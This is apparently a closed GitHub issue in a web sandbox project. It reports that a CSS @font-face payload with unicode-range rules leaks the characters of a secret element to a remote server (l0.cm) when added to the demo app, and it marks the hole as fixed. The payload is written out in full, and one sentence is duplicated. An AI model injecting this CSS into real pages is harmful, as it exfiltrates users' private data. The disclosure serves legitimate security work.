Closed weizman closed 6 months ago
Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:
<style> @font-face{ font-family:attack; src:url('//l0.cm/?Found:A'); unicode-range:U+0041; } @font-face{ font-family:attack; src:url('//l0.cm/?Found:B'); unicode-range:U+0042; } @font-face{ font-family:attack; src:url('//l0.cm/?Found:C'); unicode-range:U+0043; } #PRIVATE{ font-family:attack; } </style>
fixed #17
Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app: